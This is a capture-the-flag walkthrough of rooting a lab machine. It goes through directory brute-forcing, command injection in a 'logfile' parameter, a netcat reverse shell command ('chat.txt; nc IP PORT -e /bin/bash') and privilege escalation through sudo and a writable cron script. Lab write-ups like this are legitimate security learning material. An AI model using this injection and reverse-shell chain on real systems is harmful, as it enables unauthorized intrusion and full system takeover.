Difficulty: Easy/Medium (In my opinion)
NMAP:
Nice port 8080 is open, so let’s browse
as we can see there is a chat, but we can’t do anything so, we use dirb to brute-force directories
DIRB:
Ok we found the directory “administration.php” and other but there are rabbit hole , let’s browse this directory
Nice “Your activity has been logged”, but we can do nothing here, so let’s fuzz some parameter
ARJUN:
We found the parameter “logfile” so , we can do an LFI? mmmh No! Doesn’t work, but we can do command injection, and the result will appear directly in the chat!
COMMAND INJECTION:
And
Will appear some files! Nice , we notice that “chat.txt” can execute commands so
And
Wow! www-data so , let’s go for the reverse shell!
Command: chat.txt; nc IP PORT -e /bin/bash and listen first!
HORIZONTAL PRIVILEGE ESCALATION:
sudo -l
Nice that “start.sh” had user “julia” privilege, so add /bin/bash in that script
Nice!!!
VERTICAL PRIVILEGE ESCALATION:
Initially we do not notice anything interesting but, if we try to see in / etc / crontab we notice a file running on the system and running, so we can exploit it.
For convenience it uses pspy64 which shows me the files that are running on the system. To understand how often it is performed.
Now put pspy64 on target shell in /tmp directory and give privilege “chmod +x pspy64 and run it ./pspy64
And run now!
as we can see every 1 minutes, we run the “check.sh” script so we also notice that it is an editable file! Then let’s add our payload for the reverse shell.
Just wait and listen on port 4444, and…..
WE ARE ROOT!
Thank you everyone, i hope this is useful!
-0xJin
